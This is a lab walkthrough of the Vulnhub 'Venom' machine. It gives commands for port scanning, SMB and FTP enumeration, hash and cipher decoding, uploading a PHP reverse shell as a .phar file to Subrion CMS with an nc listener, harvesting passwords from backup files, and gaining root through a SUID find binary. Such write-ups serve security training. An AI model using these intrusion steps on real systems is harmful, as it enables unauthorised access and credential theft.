Venom Walkthrough – Vulnhub – Writeup

Welcome to another OSCP like challenge Venom from Vulnhub. This machine requires a bit of enumeration to get the foothold. Otherwise, it’s an easy machine to do. Venom Walkthrough – Vulnhub – Writeup

Link to the machine: https://www.vulnhub.com/entry/venom-1,701/

Walkthrough of Ripper

Identify the target

Firstly, I had to identify the IP address of the target machine that I am going to do challenge of.

fping -aqg 10.0.2.0/24

Scan open ports

The next step is to check for the open ports on the target machine.

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.0.2.37

Enumerate the results

Here, we have some ports open. Firstly, I decided to take a look at the apache server. Although it has the default page, I found an MD5 hash in the comment.

So, I pasted the MD5 hash on the crackstation website to get the result ‘hostinger’.

Up to now, I had no idea about what this is. So, I looked up the internet if I could find anything. Then, I enumerate the SMB server.

enum4linux -a 10.0.2.37

It looked like he is one of the users in the machine. So, I tried it as the username and password in the FTP server. Luckily, I got access to it.

ftp 10.0.2.37
# username and password as hostinger
ls -al
cd files
ls -al
get hint.txt

In the FTP server, I got a hint file that I downloaded instantly and exited from the FTP server.

cat hint.txt

From the screenshot above, we got many pieces of information as follows:

  • There are some base64 encoded messages that I had to decode. This is an easy part.
  • The hostname of the box is venom.box.
  • There is an encoded password that I had to decode.
  • As usual, there are cryptic names hostinger and dora that I still didn’t know of.

So, I started decoding messages.

echo WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= | base64 -d | base64 -d | base64 -d
echo aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= | base64 -d

To put all these pieces together, I got the following message.

You need to follow the 'hostinger' on standard vigenere cipher also https://cryptii.com/pipes/vigenere-cipher

After this, I added the hostname to hosts file.

sudo vi /etc/hosts

The hostname would lead me to a website built on Subrion CMS v4.2.1.

Upon searching the exploits, I found that there is an authenticated file upload bypass vulnerability for this version.

https://www.exploit-db.com/exploits/49876

Decoding the password

I opened the link that I decoded. Basically, the encoding mechanism required a key. So, I guessed that one of them is the key and another is the username and I was right.

Using this information, I logged in as the user dora in the CMS.

Then, I moved on to use the exploit. However, it didn’t work because in the code, the author had used hardcoded values in the headers.

So, I had two ways to move further. Either I could change the pieces of information in the code or I should find a different way. Since this is a simple file upload vulnerability, I could get the same result doing actions manually. Moreover, there is a link in the comments of the exploit’s file which lead to a github issue.

https://github.com/intelliants/subrion/issues/801

The issue had clear steps to perform the exploits. Hence, I copied a web shell from my kali distro. Then, I changed the ip and port. Lastly, I changed the extension to phar.

cp /usr/share/webshells/php/php-reverse-shell.php shell.phar

Then, I started listening on the port.

nc -nlvp 4444

Now, I had to upload the shell from the path /panel/uploads and invoke it from the browser.

Finally, I got the shell.

SHELL=/bin/bash script -q /dev/null
export TERM=xterm

Getting user’s privileges

First thing that I do after I get the access is to look for some credentials and look for the users. I got the credentials for the mysql database but that didn’t lead me anywhere.

cat /etc/passwd | grep bash

However, since I already knew the behaviour of the user hostinger that he reuses the passwords, I could try the same to switch to the users. But there is also a file that had the password.

cd /var/backup.bak
ls -al
cat .backup.txt
su hostinger

For the next part, it took me around half a day because I wasn’t looking properly. After a lot of enumeration, I came to the conclusion that the user hostinger isn’t of any use and I had to find some credentials in the CMS files. Luckily, after searching subtly, I found a file in backup directory.

cd /var/www/html/subrion/backup/
ls -al
cat .htaccess

Then, I could switch to the user nathan.

su nathan
cd
ls -al
cat user.txt

Root privilege escalation

Then, I looked into the SUID binaries that the user had access to.

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

It looked like there is an SUID permission on the find binary. As you can see the command, we can clearly run shell commands using this method.

Reference: https://gtfobins.github.io/gtfobins/find/

find . -exec /bin/bash -p \; -quit

Ultimately, I got the access to the root.

Conclusion

This machine is a very nice machine to do the challenge. Although I had got a feeling that I had to find the credentials of the user nathan, I didn’t do that. This took up a lot of time of mine. Otherwise, this is machine is quite straightforward. Thanks to the authors, Ayush Bawariya and Avnish Kumar for the machine.

0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments